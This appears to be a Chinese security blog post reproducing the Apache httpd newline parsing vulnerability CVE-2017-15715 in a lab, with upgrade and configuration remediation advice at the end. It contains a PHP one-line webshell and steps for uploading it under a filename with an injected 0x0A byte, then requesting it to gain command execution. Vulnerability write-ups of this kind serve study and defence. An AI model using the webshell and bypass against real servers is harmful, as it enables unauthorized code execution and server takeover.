apache-httpd_换行解析漏洞_CVE-2017-15715

这篇文章详细描述了ApacheHTTPD2.4.0至2.4.29版本中的一个高危漏洞,该漏洞允许通过换行符绕过安全策略,进行PHP文件解析和命令执行。通过Nuclei工具可扫描并验证漏洞,建议及时升级以修复这一问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

apache-httpd_换行解析漏洞_CVE-2017-15715

说明内容
漏洞编号CVE-2017-15715
漏洞名称apache-httpd 换行解析漏洞
漏洞评级高危
影响范围Apache HTTPd 2.4.0~2.4.29
漏洞描述apache 在修复第一个后缀名解析漏洞时,绕过一些服务器的安全策略
修复方案升级

漏洞描述

Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。

漏洞等级

高危

影响版本

  • Apache HTTPd 2.4.0~2.4.29

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
apache httpd2.4.0

漏洞扫描

使用nuclei工具可以扫描到

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

  1. 启动环境,访问网站

    在这里插入图片描述

  2. 上传文件,内容为一句话木马+phpinfo,格式为.php,进行抓包

    <?php @eval($_REQUEST[777]);phpinfo(); ?>
    

    在这里插入图片描述

  3. 在文件名1_info.php后加一个.,为了之后好找

    1_info.php.
    

    在这里插入图片描述

  4. 查看16进制编码,找到刚刚添加的.,编码为2e

    在这里插入图片描述

  5. 将2e修改为0a,进行发包

    在这里插入图片描述

  6. 访问刚刚上传的1_info.php%0a

    http://192.168.117.163/1_info.php%0a
    

    在这里插入图片描述

深度利用

命令执行

可以通过修改php文件内容进行命令执行

GetShell

可以通过上传木马getshell

漏洞挖掘

网络测绘

apache httpd

修复建议

### Apache HTTPD 换行解析漏洞详情 Apache HTTPD 的 2.4.0 至 2.4.29 版本中存在一个严重的解析漏洞,编号为 CVE-2017-15715。此漏洞允许攻击者通过特定方式利用文件名中的换行符 (\x0A),使服务器错误地处理 PHP 文件[^1]。 当请求路径包含 \x0A 字符时,Apache HTTPD 可能会将其解释为新行字符并继续执行后续部分作为有效脚本。这使得恶意用户能够绕过基于 URL 或扩展名的安全控制措施,从而可能访问受限资源或执行任意代码[^2]。 例如,在 php 解析过程中 `test.php\x0A` 将被当作正常的 PHP 后缀进行解析,进而触发该漏洞。 ### 修复方法 为了防止此类攻击的发生,官方建议升级到最新稳定版的 Apache HTTP Server (至少 2.4.30+) 来获得针对这一问题的补丁和支持改进。 如果无法立即更新,则可以考虑采取以下临时缓解措施之一: #### 修改配置文件 编辑 httpd.conf 配置文件以禁用 mod_mime_magic 模块加载: ```apache LoadModule mime_module modules/mod_mime.so # Comment out or remove the following line to disable magic MIME type detection # LoadModule mime_magic_module modules/mod_mime_magic.so ``` #### 使用 .htaccess 设置 对于那些没有权限修改全局配置的情况,可以在应用程序根目录下的 `.htaccess` 中加入如下指令来阻止含有非法字符的 URI 请求: ```apache <If "%{THE_REQUEST} =~ /[\r\n]/"> Require all denied </If> ``` 这些更改有助于减少因未修补版本而带来的风险,但仍强烈推荐尽快安装正式发布的安全更新包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值